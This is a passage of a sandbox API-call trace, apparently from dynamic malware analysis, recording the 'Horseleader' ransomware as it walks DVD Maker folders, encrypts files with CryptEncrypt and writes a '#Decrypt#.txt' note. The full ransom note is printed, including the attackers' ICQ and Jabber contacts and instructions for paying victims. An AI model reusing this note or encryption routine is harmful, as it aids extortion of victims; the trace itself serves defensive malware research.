returned 0x0 [0251.938] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.938] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomainmask_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.938] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, 
ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 1 [0251.938] lstrcmpiW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="Windows") returned -1 [0251.938] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv") returned 80 [0251.938] StrStrIW (lpFirst="TravelIntroToMain_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.939] lstrcmpW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.939] lstrcmpW (lpString1="TravelIntroToMain_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.939] lstrlenW (lpString=".testttjffg") returned 11 [0251.939] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.939] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.939] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\travelintrotomain_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.940] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, 
ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 0 [0251.940] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.941] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\#Decrypt#.txt") returned 68 [0251.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.943] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.943] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.944] lstrlenA (lpString="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") returned 1368 [0251.944] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.944] CloseHandle (hObject=0x158) returned 1 [0251.945] GetProcessHeap () returned 0x780000 [0251.945] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.945] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VideoWall", cAlternateFileName="VIDEOW~1")) returned 1 [0251.945] lstrcmpiW (lpString1="VideoWall", lpString2="Windows") returned -1 [0251.945] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned 57 [0251.945] lstrcmpW (lpString1="VideoWall", lpString2=".") returned 1 [0251.945] lstrcmpW (lpString1="VideoWall", lpString2="..") returned 1 [0251.945] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.945] GetProcessHeap () returned 0x780000 [0251.945] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.945] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*") returned 59 [0251.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.945] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.945] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\.") returned 59 [0251.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.946] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa820921, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.946] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\..") returned 60 [0251.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.946] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0251.946] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2a3ff0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2a3ff0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb04, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="203x8subpicture.png", cAlternateFileName="")) returned 1 [0251.946] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0251.946] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png") returned 77 [0251.946] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".horseleader") returned 0x0 [0251.946] lstrcmpW (lpString1="203x8subpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.946] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.946] lstrlenW (lpString=".testttjffg") returned 11 [0251.946] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.946] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.946] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0251.947] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="videowall.png", cAlternateFileName="")) returned 1 [0251.947] lstrcmpiW (lpString1="videowall.png", lpString2="Windows") returned -1 [0251.947] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png") returned 71 [0251.947] StrStrIW (lpFirst="videowall.png", lpSrch=".horseleader") returned 0x0 [0251.947] lstrcmpW (lpString1="videowall.png", lpString2="#Decrypt#.txt") returned 1 [0251.947] lstrcmpW (lpString1="videowall.png", lpString2="_uninstalling_.png") returned 1 [0251.947] lstrlenW (lpString=".testttjffg") returned 11 [0251.947] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png", lpSrch=".testttjffg") returned 0x0 [0251.947] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.947] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 
[0251.947] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="videowall.png", cAlternateFileName="")) returned 0 [0251.947] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.947] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\#Decrypt#.txt") returned 71 [0251.947] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.948] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.948] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.949] lstrlenA (lpString="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") returned 1368 [0251.949] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.950] CloseHandle (hObject=0x158) returned 1 [0251.950] GetProcessHeap () returned 0x780000 [0251.950] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.950] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Vignette", cAlternateFileName="")) returned 1 [0251.950] lstrcmpiW (lpString1="Vignette", lpString2="Windows") returned -1 [0251.950] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 56 [0251.950] lstrcmpW (lpString1="Vignette", lpString2=".") returned 1 [0251.950] lstrcmpW (lpString1="Vignette", lpString2="..") returned 1 [0251.950] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.950] GetProcessHeap () returned 0x780000 [0251.950] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0251.950] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*") returned 58 [0251.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.972] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\.") returned 58 [0251.972] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.972] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.972] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\..") returned 59 [0251.972] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.972] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.972] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.972] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.972] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png") returned 74 [0251.972] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.972] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.973] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.973] lstrlenW (lpString=".testttjffg") returned 11 [0251.973] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.973] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.973] FindNextFileW 
(in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.973] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.973] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png") returned 69 [0251.974] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.974] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.974] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.974] lstrlenW (lpString=".testttjffg") returned 11 [0251.974] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.974] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.974] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.974] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.974] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.974] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.975] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.975] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.975] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.975] lstrlenW (lpString=".testttjffg") returned 11 [0251.975] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.975] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.975] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
